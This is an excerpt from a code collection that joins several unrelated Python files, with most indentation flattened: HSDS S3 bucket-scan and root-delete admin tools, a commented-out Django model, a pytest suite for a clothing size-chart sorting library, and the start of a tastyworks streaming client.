log.info(f"getS3RootKeysCallback, {len(s3keys)} items")
if not isinstance(s3keys, list):
log.error("expected list result for s3keys callback")
raise ValueError("unexpected callback format")
results = app["bucket_scan"]
for s3key in s3keys:
log.info(f"got key: {s3key}")
if not s3key.startswith("db/") or s3key[-1] != '/':
log.error(f"unexpected key for getS3RootKeysCallback: {s3key}")
continue
root_id = getObjId(s3key + ".group.json")
log.info(f"root_id: {root_id}")
results["root_count"] += 1
info_key = s3key + ".info.json"
if app["scanRootKeys_update"]:
log.info("updating...")
await scanRoot(app, root_id, update=True)
info_obj = None
try:
info_obj = await getS3JSONObj(app, info_key)
except HTTPNotFound:
pass # info.json not created yet
except HTTPInternalServerError as ie:
log.warn(f"error getting s3obj: {ie}")
continue
if info_obj:
log.info(f"got obj: {info_obj}")
results["info_count"] += 1
results["group_count"] += info_obj["num_groups"]
results["dataset_count"] += len(info_obj["datasets"])
results["datatype_count"] += info_obj["num_datatypes"]
results["chunk_count"] += info_obj["num_chunks"]
results["allocated_bytes"] += info_obj["allocated_bytes"]
results["metadata_bytes"] += info_obj["metadata_bytes"]
async def scanRootKeys(app, update=False):
# iterate through all s3 root keys in the bucket.
#
# Note: not re-entrant! Only one scanRoot an be run at a time per app.
log.info("scanRootKeys")
app["scanRootKeys_update"] = update
await getS3Keys(app, prefix="db/", deliminator='/', include_stats=False, callback=getS3RootKeysCallback)
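# --- Hedged note (comments only; layout inferred from the key handling above) ---
# The scan lists the top-level folders under the "db/" prefix; for each root folder
# "db/<root>/" it expects the schema v2 objects
#   db/<root>/.group.json   (the root group)
#   db/<root>/.info.json    (aggregated stats, rewritten first when --update is given)
# and accumulates their counts into app["bucket_scan"].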
#
# Print usage and exit
#
def printUsage():
print(" python bucket_scan.py [--update]")
    sys.exit()
async def run_scan(app, update=False):
scan_results = {}
scan_results["root_count"] = 0
scan_results["info_count"] = 0
scan_results["updated_count"] = 0
scan_results["group_count"] = 0
scan_results["dataset_count"] = 0
scan_results["datatype_count"] = 0
scan_results["chunk_count"] = 0
scan_results["allocated_bytes"] = 0
scan_results["metadata_bytes"] = 0
app["bucket_scan"] = scan_results
results = await scanRootKeys(app, update=update)
await releaseClient(app)
return results
def main():
if len(sys.argv) > 1 and (sys.argv[1] == "-h" or sys.argv[1] == "--help"):
printUsage()
if len(sys.argv) > 1 and sys.argv[1] == "--update":
do_update = True
else:
do_update = False
# we need to setup a asyncio loop to query s3
loop = asyncio.get_event_loop()
app = {}
app["bucket_name"] = config.get("bucket_name")
app["loop"] = loop
session = get_session(loop=loop)
app["session"] = session
loop.run_until_complete(run_scan(app, update=do_update))
loop.close()
results = app["bucket_scan"]
print("root_count:", results["root_count"])
print("info_count:", results["info_count"])
print("group_count", results["group_count"])
print("dataset_count:", results["dataset_count"])
print("datatype_count", results["datatype_count"])
print("chunk_count:", results["chunk_count"])
print('allocated_bytes:', results["allocated_bytes"])
print("metadata_bytes:", results["metadata_bytes"])
print("updated_count:", results["updated_count"])
print("done!")
main()
```
#### File: hsds/tools/root_delete.py
```python
import asyncio
import sys
from aiobotocore import get_session
from util.idUtil import isValidUuid, isSchema2Id
from util.s3Util import releaseClient
from async_lib import removeKeys
import config
# This is a utility to remove all keys for a given rootid
# Note: only works with schema v2 domains!
#
# Print usage and exit
#
def printUsage():
print(" python root_delete.py [rootid]")
    sys.exit()
async def run_delete(app, rootid):
results = await removeKeys(app, rootid)
await releaseClient(app)
return results
def main():
    if len(sys.argv) == 1 or (len(sys.argv) > 1 and sys.argv[1] in ("-h", "--help")):
printUsage()
rootid = sys.argv[1]
if not isValidUuid(rootid):
print("Invalid root id!")
sys.exit(1)
if not isSchema2Id(rootid):
print("This tool can only be used with Schema v2 ids")
sys.exit(1)
# we need to setup a asyncio loop to query s3
loop = asyncio.get_event_loop()
app = {}
app["bucket_name"] = config.get("bucket_name")
app["loop"] = loop
session = get_session(loop=loop)
app["session"] = session
loop.run_until_complete(run_delete(app, rootid))
loop.close()
print("done!")
main()
``` |
{
"source": "Jonothompson/reflib",
"score": 2
} |
#### File: apps/library/models.py
```python
from __future__ import unicode_literals
from django.db import models
# class LibraryPictures(models.Model):
#     title = models.CharField(max_length=100, blank=False, null=False)
# uploadedPicture = models.FileField(upload_to='')
# tags = models.ManyToManyField(Tag)
#
#
# class Tag(models.Model):
# word = models.CharField(max_length=35)
# slug = models.CharField(max_length=250)
# created_at = models.DateTimeField(auto_now_add=False)
#
# def __unicode__(self):
# return self.word
``` |
{
"source": "jonovate/sizesorter",
"score": 2
} |
#### File: sizesorter/tests/test_sizechart.py
```python
import os
import sys
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if parentdir not in sys.path:
sys.path.insert(0, parentdir)
###
import pytest
from sizesorter import (
Size,
DynOp,
SizeChart,
SIZE_CHART_DEFAULTS,
DYNAMIC_OPERATIONS_DEFAULTS,
SIZE_CHART_FORMAT_DEFAULTS,
)
from sizechart_samples import (
SIZE_CHART_SIMPLE,
SIZE_CHART_BABY_TODDLER_KID_SIZES,
DYNAMIC_OPS_BABY_TODDLER_KID_SIZES,
SIZE_CHART_WOMENS_TOPS,
)
# Doesn't work with Parameterized Test Cases. https://github.com/pytest-dev/pytest/issues/349
# @pytest.fixture(scope='module',
# params=[(SIZE_CHART_DEFAULTS, None),
# (SIZE_CHART_DEFAULTS, DYNAMIC_OPERATIONS_DEFAULTS)])
# def default_size_chart(request):
# return SizeChart(*request.param)
@pytest.fixture(scope='module')
def default_size_chart():
return SizeChart(SIZE_CHART_DEFAULTS, None)
@pytest.fixture(scope='module')
def default_size_chart_and_dynops():
return SizeChart(SIZE_CHART_DEFAULTS, DYNAMIC_OPERATIONS_DEFAULTS)
def custom_dynops():
return {'A': DynOp('A', 5, -1), 'C': DynOp('C', 5, 1)}
@pytest.fixture(scope='module')
def custom_size_chart():
return SizeChart.from_simple_dict( {'A': 1, 'B': 2, 'C': 3}, custom_dynops())
@pytest.fixture(scope='module')
def baby_toddler_kids_size_chart():
#TODO -- Offset Increment
#TODO - min/max dyn ops
return SizeChart(SIZE_CHART_BABY_TODDLER_KID_SIZES, DYNAMIC_OPS_BABY_TODDLER_KID_SIZES)
def test_class():
size_chart = SizeChart()
assert id(size_chart) > 0
assert len(SIZE_CHART_DEFAULTS) == 5 # Make sure length hasn't changed ('XS' -> 'XL')
assert len(size_chart) == len(SIZE_CHART_DEFAULTS)
dyn_ops = {'XS': DynOp('XS', 1, -1), 'XL': DynOp('XL', 1, 1)}
assert id(dyn_ops)
size = next(iter(size_chart.size_chart.values()))
assert str(size) == '{} ({})'.format(size.verbose, size.key)
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'XS', ('2XS', 'S')),
(default_size_chart, 'S', ('XS', 'M')),
(default_size_chart, 'M', ('S','L')),
(default_size_chart, 'L', ('M', 'XL')),
(default_size_chart, 'XL', ('L','2XL')),
],)
def test_class_default_double_pointers(size_chart, size_key, expected_tpl):
size = size_chart().size_chart[size_key]
assert size.previous_size_key == expected_tpl[0]
assert size.next_size_key == expected_tpl[1]
@pytest.mark.parametrize("test_case_id, expected_tpl",
[(1, (ValueError, 'of type Size')),
(2, (ValueError, 'base suffix not in size_chart')),
(3, (ValueError, 'base suffix not in size_chart')),
(4, (ValueError, 'sort_value_increment must be a positive number')),
(5, (ValueError, 'sort_value_increment must be a positive number')),
(6, (ValueError, 'growth_direction must 1 or -1')),
(7, (ValueError, 'growth_direction must 1 or -1')),
],)
def test_invalid_chart(test_case_id, expected_tpl):
bad_size_chart = {'H': 4, 'J': Size('J', 10)}
offset = {'A': DynOp('A', 25, -1), 'Z': DynOp('Z', 25, 1)}
with pytest.raises(expected_tpl[0]) as ee:
if test_case_id == 1:
SizeChart(bad_size_chart) #Wrong Dict value
del(bad_size_chart['H'])
if test_case_id == 2:
SizeChart(bad_size_chart, offset) #Missing A
bad_size_chart['A'] = Size('A', 1)
if test_case_id == 3:
SizeChart(bad_size_chart, offset) #Missing Z
bad_size_chart['Z'] = Size('Z', 26)
new_bad_offset = {'A': DynOp('A', 0, 1), 'Z': DynOp('Z', 0, -1)}
if test_case_id == 4:
SizeChart(bad_size_chart, new_bad_offset) #Bad increment
new_bad_offset['A'] = DynOp('A', 50, 1)
if test_case_id == 5:
SizeChart(bad_size_chart, new_bad_offset) #Bad increment
new_bad_offset = {'A': DynOp('A', 50, -5), 'Z': DynOp('Z', 60, 4)}
if test_case_id == 6:
SizeChart(bad_size_chart, new_bad_offset) #Bad growth
new_bad_offset['A'] = DynOp('A', 50, -1)
if test_case_id == 7:
SizeChart(bad_size_chart, new_bad_offset) #Bad growth
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("test_case_id, expected_tpl",
[(1, (ValueError, 'Size Chart dictionary values must be Numbers')),
(2, (ValueError, 'base suffix not in size_chart')),
(3, (ValueError, 'base suffix not in size_chart')),
(4, (ValueError, 'sort_value_increment must be a positive number')),
(5, (ValueError, 'sort_value_increment must be a positive number')),
(6, (ValueError, 'growth_direction must 1 or -1')),
(7, (ValueError, 'growth_direction must 1 or -1')),
],)
def test_invalid_simple_chart(test_case_id, expected_tpl):
bad_chart = {'J': 10, 'K': Size('K', 11)}
offset = {'A': DynOp('A', 25, -1), 'Z': DynOp('Z', 25, 1)}
with pytest.raises(expected_tpl[0]) as ee:
if test_case_id == 1:
SizeChart.from_simple_dict(bad_chart) #Wrong Dict Value
del(bad_chart['K'])
if test_case_id == 2:
SizeChart.from_simple_dict(bad_chart, offset) #Missing A
bad_chart['A'] = 1
if test_case_id == 3:
SizeChart.from_simple_dict(bad_chart, offset) #Missing Z
bad_chart['Z'] = 26
new_bad_offset = {'A': DynOp('A', 0, -1), 'Z': DynOp('Z', 0, 1)}
if test_case_id == 4:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad increment
new_bad_offset = {'A': DynOp('A', 10, -1), 'Z': DynOp('Z', -5, 1)}
if test_case_id == 5:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad increment
new_bad_offset = {'A': DynOp('A', 10, -4), 'Z': DynOp('Z', 10, 4)}
if test_case_id == 6:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad growth
new_bad_offset['A'] = DynOp('A', 50, -1)
if test_case_id == 7:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad growth
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'M', (None)),
(default_size_chart, 'XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '1XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '-2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])), #debatable
(default_size_chart, '15XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '1XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart, 'XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart, '3XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart, '+3XL',(DYNAMIC_OPERATIONS_DEFAULTS['XL'])), #debatable
(default_size_chart, '10XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, 'M', (None)),
(default_size_chart_and_dynops, 'XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, '1XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, '2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, '-2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])), #debatable
(default_size_chart_and_dynops, '15XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, 'XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, '1XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, '3XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, '+3XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])), #debatable
(default_size_chart_and_dynops, '10XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(custom_size_chart, 'B', (None)),
(custom_size_chart, 'A', (custom_dynops()['A'])),
(custom_size_chart, '1A', (custom_dynops()['A'])),
(custom_size_chart, '3A', (custom_dynops()['A'])),
(custom_size_chart, '-3A', (custom_dynops()['A'])), #debatable
(custom_size_chart, '14A', (custom_dynops()['A'])),
(custom_size_chart, '1C', (custom_dynops()['C'])),
(custom_size_chart, 'C', (custom_dynops()['C'])),
(custom_size_chart, '5C', (custom_dynops()['C'])),
(custom_size_chart, '+5C', (custom_dynops()['C'])), #debatable
(custom_size_chart, '100C', (custom_dynops()['C'])),
],)
def test_find_dynamic_operation(size_chart, size_key, expected_tpl):
assert size_chart()._find_dynamic_operation(size_key) == expected_tpl#[0] #py collapses single
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'M', ('M')),
(default_size_chart, 'XL', ('XL')),
(default_size_chart, '1XL', ('XL')),
(default_size_chart, '10XL', ('10XL')),
(default_size_chart, '11XL', ('11XL')),
(default_size_chart, '1', ('1')),
(default_size_chart, '10', ('10')),
(default_size_chart, 1, ('1')),
(default_size_chart, 10, ('10')),
],)
def test_handle_single_prefix(size_chart, size_key, expected_tpl):
assert size_chart()._handle_single_prefix(size_key) == expected_tpl#[0] Single tpls unpack
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'M', ('', 'M', False)),
(default_size_chart, 'XS', ('', 'XS', True)),
(default_size_chart, '1XS', ('', 'XS', True)),
(default_size_chart, '2XS', ('2', 'XS', True)),
(default_size_chart, '15XS', ('15', 'XS', True)),
(default_size_chart, 'XL', ('', 'XL', True)),
(default_size_chart, '1XL', ('', 'XL', True)),
(default_size_chart, '3XL', ('3', 'XL', True)),
(default_size_chart, '10XL', ('10', 'XL', True)),
(default_size_chart_and_dynops, 'M', ('', 'M', False)),
(default_size_chart_and_dynops, 'XS', ('', 'XS', True)),
(default_size_chart_and_dynops, '1XS', ('', 'XS', True)),
(default_size_chart_and_dynops, '2XS', ('2', 'XS', True)),
(default_size_chart_and_dynops, '15XS', ('15', 'XS', True)),
(default_size_chart_and_dynops, 'XL', ('', 'XL', True)),
(default_size_chart_and_dynops, '1XL', ('', 'XL', True)),
(default_size_chart_and_dynops, '3XL', ('3', 'XL', True)),
(default_size_chart_and_dynops, '10XL', ('10', 'XL', True)),
(custom_size_chart, 'B', ('', 'B', False)),
(custom_size_chart, 'A', ('', 'A', True)),
(custom_size_chart, '1A', ('', 'A', True)),
(custom_size_chart, '3A', ('3', 'A', True)),
(custom_size_chart, '14A', ('14', 'A', True)),
(custom_size_chart, 'C', ('', 'C', True)),
(custom_size_chart, '1C', ('', 'C', True)),
(custom_size_chart, '5C', ('5', 'C', True)),
(custom_size_chart, '100C', ('100', 'C', True)),
],)
def test_parse_size_key(size_chart, size_key, expected_tpl):
assert size_chart()._parse_size_key(size_key) == expected_tpl
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, '-1XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+5XL', (ValueError, 'positive number or not set')),
(default_size_chart_and_dynops, '-1XS', (ValueError, 'positive number or not set')),
(default_size_chart_and_dynops, '+5XL', (ValueError, 'positive number or not set')),
(custom_size_chart, '+2A', (ValueError, 'positive number or not set')),
(custom_size_chart, '-5C', (ValueError, 'positive number or not set')),
],)
def test_parse_size_key_exception(size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
size_chart()._parse_size_key(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
#TODO - Test Verbose and XXL keys
def test_dynamic_size_cache(default_size_chart):
chart_size = len(default_size_chart)
default_size_chart.get_or_create_size('2XS') #Size should remain the same
assert chart_size == len(default_size_chart)
default_size_chart.enable_dynamic_size_cache()
default_size_chart.get_or_create_size('2XL') #Size should increase now
chart_size += 1
assert chart_size == len(default_size_chart)
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart, '1XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart, '2XS', ('2XS', -10, '2X-Small', True, ('3XS', 'XS'))),
(default_size_chart, '15XS', ('15XS', -140, '15X-Small', True, ('16XS', '14XS'))),
(default_size_chart, 'XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart, '1XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart, '3XL', ('3XL', 120, '3X-Large', True, ('2XL', '4XL'))),
(default_size_chart, '10XL', ('10XL', 190, '10X-Large', True, ('9XL', '11XL'))),
(default_size_chart_and_dynops, 'XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart_and_dynops, '1XS', ('XS', 0, 'X-Small', True, ('2XS', 'S'))),
(default_size_chart_and_dynops, '2XS', ('2XS', -10, '2X-Small', True, ('3XS', 'XS'))),
(default_size_chart_and_dynops, '15XS', ('15XS', -140, '15X-Small', True, ('16XS', '14XS'))),
(default_size_chart_and_dynops, 'XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart_and_dynops, '1XL', ('XL', 100, 'X-Large', True, ('L', '2XL'))),
(default_size_chart_and_dynops, '3XL', ('3XL', 120, '3X-Large', True, ('2XL', '4XL'))),
(default_size_chart_and_dynops, '10XL', ('10XL', 190, '10X-Large', True, ('9XL', '11XL'))),
(custom_size_chart, 'A', ('A', 1, 'A', True, ('2A', 'B'))),
(custom_size_chart, '1A', ('A', 1, 'A', True, ('2A', 'B'))),
(custom_size_chart, '3A', ('3A', -9, '3A', True, ('4A', '2A'))),
(custom_size_chart, '14A', ('14A', -64, '14A', True, ('15A', '13A'))),
(custom_size_chart, 'C', ('C', 3, 'C', True, ('B', '2C'))),
(custom_size_chart, '1C', ('C', 3, 'C', True, ('B', '2C'))),
(custom_size_chart, '5C', ('5C', 23, '5C', True, ('4C', '6C'))),
(custom_size_chart, '100C', ('100C', 498, '100C', True, ('99C', '101C'))),
],)
def test_generate_dynamic_size(size_chart, size_key, expected_tpl):
size_chart_gen = size_chart()._generate_dynamic_size(size_key)
assert isinstance(size_chart_gen, Size)
assert size_chart_gen.key == expected_tpl[0]
assert size_chart_gen.sort_value == expected_tpl[1]
assert size_chart_gen.verbose == expected_tpl[2]
assert size_chart_gen.is_dynamic_size == expected_tpl[3]
assert size_chart_gen.previous_size_key == expected_tpl[4][0]
assert size_chart_gen.next_size_key == expected_tpl[4][1]
#TODO - Test XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, '5M', (ValueError, 'Suffix is not defined as Dynamic Size')),
(default_size_chart, 'B', (ValueError, 'Suffix is not defined as Dynamic Size')),
(default_size_chart, '-5XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', (ValueError, 'positive number or not set')),
],)
def test_generate_dynamic_size_exception(size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
        size_chart()._generate_dynamic_size(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
#TODO - Test XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'S', ('S', False, None, ('XS', 'M'))),
(default_size_chart, 'M', ('M', False, None, ('S', 'L'))),
(default_size_chart, 'L', ('L', False, None, ('M', 'XL'))),
(default_size_chart, '1XL', ('XL', False, None, ('L', '2XL'))),
(default_size_chart, '2XL', ('XL', True, 1, ('XL', '3XL'))),
(default_size_chart, '3XS', ('XS', True, 2, ('4XS', '2XS'))),
(default_size_chart_and_dynops, 'S', ('S', False, None, ('XS', 'M'))),
(default_size_chart_and_dynops, 'M', ('M', False, None, ('S', 'L'))),
(default_size_chart_and_dynops, 'L', ('L', False, None, ('M', 'XL'))),
(default_size_chart_and_dynops, '2XL', ('XL', True, 1, ('XL', '3XL'))),
(default_size_chart_and_dynops, '1XS', ('XS', False, 0, ('2XS', 'S'))),
(default_size_chart_and_dynops, '3XS', ('XS', True, 2, ('4XS', '2XS'))),
],)
#expected_tpl = (dynamic key base key, is dynamic key, factor, (previous size key, next size key))
def test_size_key_to_size(size_chart, size_key, expected_tpl):
dyn_size_base, _ = size_chart()._size_key_to_size(expected_tpl[0])
assert dyn_size_base.key == expected_tpl[0]
assert dyn_size_base.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value
dyn_size, is_new = size_chart()._size_key_to_size(size_key)
assert is_new == expected_tpl[1]
assert (dyn_size.key not in size_chart().size_chart) == expected_tpl[1]
if not is_new:
return
assert dyn_size.key == size_key
exp_dyn_op = size_chart().dyn_ops[dyn_size_base.key]
exp_factor = expected_tpl[2] * (exp_dyn_op.growth_direction * exp_dyn_op.sort_value_increment)
assert dyn_size.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value + exp_factor
assert dyn_size.sort_value == dyn_size_base.sort_value + exp_factor
assert dyn_size.previous_size_key == expected_tpl[3][0]
assert dyn_size.next_size_key == expected_tpl[3][1]
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("default_size_chart, size_key, expected_tpl",
[(default_size_chart, '5M', (ValueError, 'Base size not')),
(default_size_chart, 'B', (ValueError, 'Suffix is not defined as Dynamic')),
(default_size_chart, '-5XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', (ValueError, 'positive number or not set')),
],)
def test_size_key_to_size_exception(default_size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
default_size_chart()._size_key_to_size(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'S', ('S', None, ('XS', 'M'))),
(default_size_chart, 'M', ('M', None, ('S', 'L'))),
(default_size_chart, 'L', ('L', None, ('M', 'XL'))),
(default_size_chart, '2XL', ('XL', 1, ('XL', '3XL'))),
(default_size_chart, '3XS', ('XS', 2, ('4XS', '2XS'))),
(default_size_chart_and_dynops, 'S', ('S', None, ('XS', 'M'))),
(default_size_chart_and_dynops, 'M', ('M', None, ('S', 'L'))),
(default_size_chart_and_dynops, 'L', ('L', None, ('M', 'XL'))),
(default_size_chart_and_dynops, '2XL', ('XL', 1, ('XL', '3XL'))),
(default_size_chart_and_dynops, '3XS', ('XS', 2, ('4XS', '2XS'))),
],)
#expected_tpl = (dynamic key base key, factor, (previous size key, next size key))
def test_get_or_create_size(size_chart, size_key, expected_tpl):
dyn_size_base = size_chart().get_or_create_size(expected_tpl[0])
assert dyn_size_base.key == expected_tpl[0]
assert dyn_size_base.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value
    if size_key in size_chart().size_chart:
        return
    dyn_size = size_chart().get_or_create_size(size_key)
    assert dyn_size.key == size_key
exp_dyn_op = size_chart().dyn_ops[dyn_size_base.key]
exp_factor = expected_tpl[1] * (exp_dyn_op.growth_direction * exp_dyn_op.sort_value_increment)
assert dyn_size.sort_value == SIZE_CHART_DEFAULTS[expected_tpl[0]].sort_value + exp_factor
assert dyn_size.sort_value == dyn_size_base.sort_value + exp_factor
assert dyn_size.previous_size_key == expected_tpl[2][0]
assert dyn_size.next_size_key == expected_tpl[2][1]
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("default_size_chart, size_key, expected_tpl",
[(default_size_chart, '5M', (ValueError, 'Base size not')),
(default_size_chart, 'B', (ValueError, 'Suffix is not defined as Dynamic')),
(default_size_chart, '-5XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', (ValueError, 'positive number or not set')),
],)
def test_get_or_create_size_exception(default_size_chart, size_key, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
default_size_chart().get_or_create_size(size_key)
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, list_length, expected_list",
[(default_size_chart, 1, ['M']),
(default_size_chart, 2, ['M','L']),
(default_size_chart, 3, ['S','M','L']),
(default_size_chart, 5, ['XS','S','M','L','XL']),
(default_size_chart, None, ['XS','S','M','L','XL']),
(default_size_chart, 6, ['XS','S','M','L', 'XL','2XL']),
(default_size_chart, 7, ['2XS','XS','S','M','L','XL','2XL']),
(default_size_chart, 8, ['2XS','XS','S','M','L','XL','2XL','3XL']),
(default_size_chart_and_dynops, 1, ['M']),
(default_size_chart_and_dynops, 2, ['M','L']),
(default_size_chart_and_dynops, 3, ['S','M','L']),
(default_size_chart_and_dynops, 5, ['XS','S','M','L','XL']),
(default_size_chart_and_dynops, None, ['XS','S','M','L','XL']),
(default_size_chart_and_dynops, 6, ['XS','S','M','L', 'XL','2XL']),
(default_size_chart_and_dynops, 7, ['2XS','XS','S','M','L','XL','2XL']),
(default_size_chart_and_dynops, 8, ['2XS','XS','S','M','L','XL','2XL','3XL']),
(custom_size_chart, 1, ['B']),
(custom_size_chart, 2, ['B','C']),
(custom_size_chart, 3, ['A','B','C']),
(custom_size_chart, 5, ['2A','A','B','C','2C']),
(custom_size_chart, None, ['2A','A','B','C','2C']),
(custom_size_chart, 7, ['3A','2A','A','B','C','2C','3C']),
],)
def test_generate_lengthed_list(size_chart, list_length, expected_list):
#Generate list is supposed to remove from left first for smaller, and add to right for larger
assert size_chart().generate_lengthed_list(list_length) == expected_list
#TODO - Test Verbose and XXL keys
#TODO - Test Single-Ended
@pytest.mark.parametrize("size_chart, list_length, expected_tpl",
[(default_size_chart, 100, (ValueError, 'Length of list exceeds')),
],)
def test_generate_lengthed_list_exception(size_chart, list_length, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
        size_chart().generate_lengthed_list(list_length)
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, start_range, end_range, expected_list",
[(default_size_chart, 'M', 'M', ['M']),
(default_size_chart, 'S', 'M', ['S','M']),
(default_size_chart, 'XS', 'XL', ['XS','S','M','L','XL']),
(default_size_chart, '2XS', 'XL', ['2XS','XS','S','M','L','XL']),
(default_size_chart, 'M', '3XL', ['M','L','XL','2XL','3XL']),
(default_size_chart, '2XS', '2XL', ['2XS','XS','S','M','L','XL','2XL']),
(default_size_chart_and_dynops, 'S', 'S', ['S']),
(default_size_chart_and_dynops, 'S', 'L', ['S','M','L']),
(default_size_chart_and_dynops, 'XS', 'XL', ['XS','S','M','L','XL']),
(default_size_chart_and_dynops, '2XS', 'XL', ['2XS','XS','S','M','L','XL']),
(default_size_chart_and_dynops, 'S', '2XL', ['S','M','L','XL','2XL']),
(default_size_chart_and_dynops, '2XS', '2XL', ['2XS','XS','S','M','L','XL','2XL']),
(custom_size_chart, 'B', 'C', ['B','C']),
(custom_size_chart, 'A', 'C', ['A','B','C']),
(custom_size_chart, '3A', 'B', ['3A','2A','A','B']),
(custom_size_chart, 'A', '4C', ['A','B','C','2C','3C','4C']),
(custom_size_chart, '2A', '2C', ['2A','A','B','C','2C']),
# (baby_toddler_kids_size_chart, 'P', '12M', ['P', 'NB', '3M','6M', '9M','12M']),
# (baby_toddler_kids_size_chart, '6M', '5', ['6M', '9M','12M', '2T', '3T', '4T', '4', '5T', '5']),
],)
def test_generate_range(size_chart, start_range, end_range, expected_list):
assert list(size_chart().generate_range_iter(start_range, end_range)) == expected_list
assert size_chart().generate_range_list(start_range, end_range) == expected_list
#TODO - Test Verbose and XXL keys
#TODO - Test Single-Ended
@pytest.mark.parametrize("size_chart, start_range, end_range, expected_tpl",
[(default_size_chart, '5M', '5M', (ValueError, 'Base size not')),
(default_size_chart, 'M', '5M', (ValueError, 'Suffix is not defined as Dynamic')),
(default_size_chart, 'B', 'C', (ValueError, 'Base size not')),
(default_size_chart, '-5XS', '-3XS', (ValueError, 'positive number or not set')),
(default_size_chart, 'XS', '-3XS', (ValueError, 'positive number or not set')),
(default_size_chart, '+4XL', '+7XL', (ValueError, 'positive number or not set')),
(default_size_chart, 'XL', '+7XL', (ValueError, 'positive number or not set')),
# (baby_toddler_kids_size_chart, '1T', '5T', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '5T', '8T', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '2M', '12M', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '3M', '5M', (ValueError, 'Base size not')),
# (baby_toddler_kids_size_chart, '6M', '36M', (ValueError, 'Base size not')),
],)
def test_generate_range_exception(size_chart, start_range, end_range, expected_tpl):
with pytest.raises(expected_tpl[0]) as ee:
list(size_chart().generate_range_iter(start_range, end_range)) #Need to invoke iter
with pytest.raises(expected_tpl[0]) as ee:
size_chart().generate_range_list(start_range, end_range)
assert str(ee.value).find(expected_tpl[1]) > -1
if __name__ == "__main__":
pytest.main(['-q', '-s', '--no-cov', 'tests/test_sizechart.py'])
``` |
{
"source": "jonovate/tastyworks_api",
"score": 2
} |
#### File: tastyworks_api/tastyworks/streamer.py
```python
import asyncio
import datetime
import json
import logging
import threading
from typing import List
import requests
import websockets
from tastyworks.dxfeed import mapper as dxfeed_mapper
from tastyworks.models.session import TastyAPISession
LOGGER = logging.getLogger(__name__)
# TODO:
# * Proper exception handling and bubbling
# * Figure out how to remove stream subscriptions
class DataStreamer(object):
def __init__(self, session: TastyAPISession, timeout=60):
if not session.is_active():
raise Exception('TastyWorks API session not active/valid')
